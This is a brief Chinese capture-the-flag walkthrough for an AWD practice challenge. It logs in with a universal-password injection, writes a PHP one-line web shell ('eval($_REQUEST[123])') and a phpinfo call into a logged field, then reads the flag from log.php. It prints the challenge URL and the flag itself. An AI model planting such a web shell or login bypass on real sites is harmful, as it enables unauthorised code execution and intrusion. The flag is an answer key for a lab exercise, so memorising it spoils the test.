AWD-Test2

1.已知账号密码,可SSH连接进行代码审计。

2.登录可万能密码 进入,也可注册 后登录。

3.修改url参数,发现报错。确定为Linux系统

4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)

复制代码
<?php phpinfo();?>   //写入这个,在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>

5.访问log.php日志文件,发现里面有flag

复制代码
http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.php

flag{399aa672-cf2d-4aca-9bec-693be96a9083}

注:如果没有,可以在前面一句话处填写 <?php phpinfo();?> 并提交。

相关推荐
前端工作日常24 分钟前
我理解的eslint配置
前端·eslint
前端工作日常1 小时前
项目价值判断的核心标准
前端·程序员
NewCarRen1 小时前
汽车电子控制系统开发的整体安全理念
网络·安全·汽车
90后的晨仔1 小时前
理解 Vue 的列表渲染:从传统 DOM 到响应式世界的演进
前端·vue.js
OEC小胖胖2 小时前
性能优化(一):时间分片(Time Slicing):让你的应用在高负载下“永不卡顿”的秘密
前端·javascript·性能优化·web
烛阴2 小时前
ABS - Rhomb
前端·webgl
植物系青年2 小时前
10+核心功能点!低代码平台实现不完全指南 🧭(下)
前端·低代码
植物系青年2 小时前
10+核心功能点!低代码平台实现不完全指南 🧭(上)
前端·低代码
桑晒.2 小时前
CSRF漏洞原理及利用
前端·web安全·网络安全·csrf
宋辰月2 小时前
Vue2-VueRouter
开发语言·前端·javascript